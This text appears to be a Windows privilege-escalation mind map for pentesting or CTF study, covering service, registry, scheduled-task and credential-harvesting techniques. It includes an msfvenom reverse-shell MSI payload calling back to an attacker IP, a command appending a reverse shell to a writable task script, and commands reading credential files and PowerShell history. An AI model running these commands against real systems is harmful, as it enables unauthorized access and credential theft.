Windows PE Mind Map

This mind map covers these techniques:

1 + Misconfigured Privileges
  - Token Abusing
2 + Services
  - Service Exploits - Insecure Service Permissions
  - Service Exploits - Unquoted Service Path
  - Service Exploits - Weak Registry Permissions
  - Service Exploits - Insecure Service Executables
3 + Registry
  - Registry - AutoRuns
  - Registry - AlwaysInstallElevated
4 + Scheduled Tasks
5 + Creds in files / Harvesting Passwords from Usual Spots
  - Unattend.xml
  - Powershell History
  - Saved Windows Credentials
  - IIS Configuration
6 + Password Dumping
  - mimikatz
  - secretsdump with SAM & SYSTEM
7 + Local ports
8 + Other Methods
  - Dll Hijacking
  - Interesting Groups / DnsAdmins
  - Insecure Gui Apps
9 + Vulnerable software
10 + CVE & KERNEL EXPLOIT
  - WES-NG

Mind Map

Each question on the map has a NO / YES branch; the action written under a question is its YES branch.

TOKEN ABUSING
  NO / YES
  YES: Search the privilege you've found on the internet and follow the instructions.

SERVICE EXPLOITING (Insecure Service Permissions, Unquoted Services, Weak Registry Permissions)
  Is there any service whose config we have permission to change? : `accesschk.exe -uwcqv "$username" *` (we are looking for the "SERVICE_CHANGE_CONFIG" privilege)
  NO / YES

SCHEDULED TASKS
  Do we have any non-default scheduled task? : `Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State`
  NO / YES
  YES: Use accesschk: do we have write permission on that file? : `accesschk.exe /accepteula -quvw user C:\Path\To\Scheduled\task.ps1`
  NO / YES
  YES: `echo C:\Path\To\revshell.exe >> C:\Path\To\Scheduled\task.ps1`

ALWAYSINSTALLELEVATED (.msi backdoor)
  Create a .msi backdoor and transfer it to the target : `msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f msi -o reverse.msi`
  Then run it on the target : `msiexec /quiet /qn /i C:\Path\to\revshell.msi`

CREDENTIAL HARVESTING (Unattend.xml, Powershell history, Saved Credentials, IIS Configuration)
  Check the following locations: do they exist, and did you find creds in them?
    C:\Unattend.xml
    C:\Windows\Panther\Unattend.xml
    C:\Windows\Panther\Unattend\Unattend.xml
    C:\Windows\system32\sysprep.inf
    C:\Windows\system32\sysprep\sysprep.xml
  NO / YES
  Check powershell history : `type C:\Users\$User_name\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`
  Check if we have any saved credentials : `cmdkey /list`
  NO / YES